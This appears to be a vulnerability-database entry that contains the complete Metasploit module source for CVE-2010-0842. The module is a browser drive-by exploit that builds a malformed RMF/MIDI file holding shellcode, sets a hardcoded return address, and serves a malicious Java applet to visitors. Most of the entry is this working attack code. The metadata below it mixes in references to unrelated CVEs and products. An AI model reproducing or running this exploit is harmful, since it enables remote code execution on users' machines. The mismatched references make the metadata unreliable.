# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info={})
super(update_info(info,
'Name' => "Java MixerSequencer Object GM_Song Structure Handling Vulnerability",
'Description' => %q{
This module exploits a flaw within the handling of MixerSequencer objects
in Java 6u18 and before.

Exploitation id done by supplying a specially crafted MIDI file within an RMF
File. When the MixerSequencer objects is used to play the file, the GM_Song
structure is populated with a function pointer provided by a SONG block in the
RMF. A Midi block that contains a MIDI with a specially crafted controller event
is used to trigger the vulnerability.

When triggering the vulnerability "ebx" points to a fake event in the MIDI file
which stores the shellcode. A "jmp ebx" from msvcr71.dll is used to make the
exploit reliable over java updates.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Peter Vreugdenhil', # Vulnerability Discovery and exploit
'juan vazquez', # Metasploit module
],
'References' =>
[
[ 'CVE', '2010-0842' ],
[ 'OSVDB', '63493'],
[ 'BID', '39077'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-060/' ],
[ 'URL', 'http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/']
],
'Payload' =>
{
'Space' => 8000,
},
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Targets' =>
[
[
# Tested succesfully on:
# Windows XP SP3 / IE 6 / Java 6u18
# Windows XP SP3 / IE 7 / Java 6u18
# Windows XP SP3 / IE 8 / Java 6u18
# Windows XP SP3 / Firefox 7.0.1 / Java 6u18
# Windows XP SP3 / IE 8 / Java 6u17
# Windows XP SP3 / Firefox 7.0.1 / Java 6u17
# Windows 7 / IE 8 / Java 6u18
'Windows / Java 6 <=u18',
{
'Ret' => 0x7C35A78D # jmp ebx # msvcr71.dll
}
],
],
'Privileged' => false,
'DisclosureDate' => "Mar 30 2010",
'DefaultTarget' => 0))

end

def get_rmf

rmf_header = ""
rmf_header << "IREZ" # RMFHeaderMagic
rmf_header << "\x00\x00\x00\x01" # RMFVersionNumber
rmf_header << "\x00\x00\x00\x02" # NumberOfRMFBlocks

song_block = ""
song_block << "\x00\x00\x00\x65" # OffsetToNextBlock
song_block << "SONG" # BlockType
song_block << [target.ret].pack("N") # BlockID
song_block << "\x00" # BlockName
song_block << "\x00\x00\x00\x47" # BlockDataSize
song_block << "\x7F\xFF\x00\x01\x00\x00\x01\x01" # BlockData
song_block << "\x00\x00\x00\x04\x00\x1C\x00\x08" # BlockData
song_block << "\x00\x7F\x00\x00\x00\x00\x00\x00" # BlockData
song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData
song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData
song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData
song_block << "\x00\x01\x54\x49\x54\x4C\x9F\xB1" # BlockData
song_block << "\xB5\x0D\x0A\x7E\xFB\x70\x9C\x86" # BlockData
song_block << "\xFE\xB0\x35\x93\xE2\x5E\xDE\xF7" # BlockData

midi = ""
# HEADERCHUNK Header
midi << "MThd" # Header
midi << "\x00\x00\x00\x06" # Chunk size
midi << "\x00\x01" # Format Type
midi << "\x00\x01" # Number of tracks
midi << "\x00\x08" # Time division
# TRACKCHUNK header
midi << "MTrk" # Header
midi << "\x00\x00\x24\xd7" # Length
midi << "\x00\xb0\x80\x00" # Controller Event # Triggers the vulnerability
# Fake Midi Meta event - Shellcode
midi << "\x38" # Variable lenght delta time
midi << "\xff" # Midi meta event
midi << "\x02" # Meta event type 02 => Copyright notice
midi << "\xc9\x50" # Variable Meta Event Length
midi << payload.encoded
midi << rand_text(9123 - payload.encoded.length)

midi_block = "\x00\x00\x25\x60" # OffsetToNextBlock
midi_block << "Midi" # BlockType
midi_block << "\x00\x00\x7f\xff" # BlockID
midi_block << "\x00" # BlockName
midi_block << "\x00\x00\x24\xed" # BlockDataSize
midi_block << midi # BlockData

rmf = ""
rmf << rmf_header
rmf << song_block
rmf << midi_block

rmf_name = "#{rand_text_alpha(rand(5) + 3)}.rmf"

return rmf_name, rmf
end

def get_jar

files = [
[ "MyController.class" ],
[ "MixerMidiApplet.class" ],
[ "META-INF", "services", "javax.sound.midi.spi.MidiDeviceProvider" ]
]
jar = Rex::Zip::Jar.new
jar.add_file("META-INF/", "")
jar.add_file("META-INF/services/", "")
jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0842"))
jar.build_manifest

jar_name = "#{rand_text_alpha(rand(5) + 3)}.jar"

return jar_name, jar
end

def on_request_uri(cli, request)

if request.uri =~ /\.jar$/i
print_status("Sending JAR file to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, @jar.pack, {'Content-Type'=>'application/octet-strem'})
return
end

if request.uri =~ /\.rmf$/i
print_status("Sending RMF file to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, @rmf, {'Content-Type'=>'application/octet-strem'})
return
end

base_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
rmf_uri = base_uri + "/#{@rmf_name}"
jar_uri = base_uri + "/#{@jar_name}"

html = %Q|
<html>
<head>
</head>
<body>
<applet code="MixerMidiApplet.class" archive="#{jar_uri}" width=350 height=200>
<param name="midifile" valuetype="ref" value="#{rmf_uri}">
</applet>
</body>
</html>
|

html = html.gsub(/^\t\t/, '')

print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end

def exploit
@jar_name, @jar = get_jar
@rmf_name, @rmf = get_rmf
super
end

end

Trust: 1.0

sources: EXPLOIT-DB: 18485

EXPLOIT LANGUAGE

Trust: 1.0

sources: EXPLOIT-DB: 18485

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 18485

TYPE

GM_Song Structure Handling (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 18485

CREDITS

Metasploit

Trust: 1.0

sources: EXPLOIT-DB: 18485

EXTERNAL IDS

db:	ZDI	id:	ZDI-10-060	Trust: 1.0
db:	NVD	id:	CVE-2010-0842	Trust: 1.0
db:	EXPLOIT-DB	id:	18485	Trust: 1.0
db:	NVD	id:	CVE-2012-0053	Trust: 0.8
db:	JUNIPER	id:	JSA10642	Trust: 0.6
db:	JUNIPER	id:	JSA10585	Trust: 0.6
db:	PACKETSTORM	id:	109284	Trust: 0.5
db:	HITACHI	id:	HS12-033	Trust: 0.3
db:	BID	id:	51706	Trust: 0.3
db:	JUNIPER	id:	JSA10658	Trust: 0.3
db:	NVD	id:	CVE-2011-3368	Trust: 0.3
db:	BID	id:	49957	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 18485

REFERENCES

url:	http://www.zerodayinitiative.com/advisories/zdi-10-060/	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2010-0842	Trust: 1.0
url:	http://support.avaya.com/css/p8/documents/100158872	Trust: 0.6
url:	http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03231301&ac.admitted=1332965374461.876444892.492883150	Trust: 0.6
url:	http://httpd.apache.org/	Trust: 0.6
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10642&cat=sirt_1&actp=list	Trust: 0.6
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10585	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2012-0053	Trust: 0.5
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004302	Trust: 0.3
url:	https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03691745	Trust: 0.3
url:	http://httpd.apache.org/security/vulnerabilities_20.html	Trust: 0.3
url:	http://www.sophos.com/en-us/support/knowledgebase/119773.aspx	Trust: 0.3
url:	http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15273.html	Trust: 0.3
url:	http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912	Trust: 0.3
url:	http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041	Trust: 0.3
url:	http://mail-archives.apache.org/mod_mbox/httpd-announce/201307.mbox/%3c20130710124920.2b8793ed.wrowe%40rowe-clan.net%3e	Trust: 0.3
url:	http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities	Trust: 0.3
url:	https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigational	Trust: 0.3
url:	http://www.fujitsu.com/global/support/software/security/products-f/interstage-201203e.html	Trust: 0.3
url:	http://www.xerox.com/download/security/security-bulletin/16aeb-4cd3628b94080/cert_xrx12-009_v1.1.pdf	Trust: 0.3
url:	http://httpd.apache.org/security/vulnerabilities_22.html	Trust: 0.3
url:	http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-033/index.html	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100157326	Trust: 0.3
url:	http://www.fujitsu.com/global/support/software/security/products-f/interstage-201104e.html	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100151220	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10658&cat=sirt_1&actp=list	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=nas2b7c57b1f1035675186257927003c8d48	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html	Trust: 0.3
url:	http://seclists.org/fulldisclosure/2011/oct/232	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg1pm48384	Trust: 0.3
url:	https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03517954&ac.admitted=1349807398574.876444892.199480143	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg27014506	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html	Trust: 0.3
url:	http://www.xerox.com/download/security/security-bulletin/12047-4e4eed8d42ca6/cert_xrx13-007_v1.0.pdf	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100152144	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 18485

SOURCES

db:	BID	id:	51706
db:	BID	id:	49957
db:	PACKETSTORM	id:	109284
db:	EXPLOIT-DB	id:	18485

LAST UPDATE DATE

2023-05-30T11:42:40.679000+00:00

SOURCES UPDATE DATE

db:	BID	id:	51706	date:	2015-04-13T21:30:00
db:	BID	id:	49957	date:	2015-05-07T17:07:00

SOURCES RELEASE DATE

db:	BID	id:	51706	date:	2012-01-23T00:00:00
db:	BID	id:	49957	date:	2011-10-05T00:00:00
db:	PACKETSTORM	id:	109284	date:	2012-01-31T11:11:11
db:	EXPLOIT-DB	id:	18485	date:	2012-02-16T00:00:00

tag:	Metasploit Framework (MSF)	Trust: 1.0
tag:	exploit	Trust: 0.5
tag:	remote	Trust: 0.5
tag:	protocol	Trust: 0.5
tag:	proof of concept	Trust: 0.5
tag:	info disclosure	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE